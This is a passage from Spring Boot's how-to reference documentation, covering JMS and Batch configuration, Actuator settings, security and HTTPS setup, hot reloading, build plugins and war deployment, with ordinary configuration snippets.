If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property:\n`management.server.port`. 
To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\nFor more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`"\nin the "`Production-ready features`" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on "`<<boot-features-error-handling, Error Handling>>`" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize Sensitive Values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive,\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword "password", "secret", "key", or "token" is sanitized. 
It is also possible to use a\nregular expression instead, such as `+*credentials.*+`, to sanitize any key that contains\nthe word `credentials`.\n\nThe patterns to use can be customized by using the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` properties, respectively.\n\n\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. 
The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload, as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be "built" for the change to take effect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttps:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel], it is usually significantly faster than\na "`cold start`". 
You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties. The build information is written to a\n`META-INF\/build-info.properties` file; when that file is present, Spring Boot\nauto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs="verbatim,attributes"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid "com.gorylenko.gradle-git-properties" version "1.5.1"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. 
Using\nthis format lets the time be parsed into a `Date`, and its format, when serialized to\nJSON, is then controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<\/slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable "`fat`" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. 
The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. 
For example, the `application.yml` configuration file might be excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact, and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. 
Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`\nattribute in the manifest and specify the other properties it needs as manifest entries --\nprincipally, by setting a `Start-Class` property.\n\nThe following example shows how to build an executable archive with Ant:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` file with a `manual` task that should work if you run it with the following\ncommand:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nThen you can run the application with the following command:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-traditional-deployment]]\n== Traditional Deployment\n\nSpring Boot supports traditional deployment as well as more modern forms of deployment.\nThis section answers common questions about traditional deployment.\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a Deployable War File\n\nWARNING: Because Spring WebFlux does not strictly depend on the Servlet API and\napplications are deployed by default on an embedded Reactor Netty server,\nWar deployment is not supported for WebFlux applications.\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. Doing so\nmakes use of Spring Framework's Servlet 3.0 support and lets you configure your\napplication when it is launched by the servlet container. Typically, you should update\nyour application's main class to extend `SpringBootServletInitializer`, as shown in the\nfollowing example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration such that your project produces a war\nfile rather than a jar file. 
If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. 
See the https:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nTo create a deployable war by extending `SpringBootServletInitializer` (for example, in a\nclass called `Application`) and adding the Spring Boot `@SpringBootApplication`\nannotation, use code similar to that shown in the following example:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in `sources` is merely a Spring `ApplicationContext`.\nNormally, anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working before you need to do that.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. The same applies to `messages.properties`\n(which Spring Boot automatically detects in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. If you have other features in your application (for instance, using other\nservlets or filters), you may need to add some configuration to your `Application`\ncontext, replacing those elements from `web.xml`, as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\ncontainer as if it were a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a\n`<filter\/>` and `<filter-mapping\/>`).\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\nyour `Application`. 
Alternatively, simple cases where annotation configuration is\nheavily used already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war file is working, you can make it executable by adding a `main` method to\nyour `Application`, as shown in the following example:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is available both to the\n`SpringBootServletInitializer` callback and to the `main` method in a class similar to the\nfollowing:\n\n[source,java,indent=0,subs="verbatim,quotes,attributes"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntechniques.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally, all the code from an existing\n`WebApplicationInitializer` can be 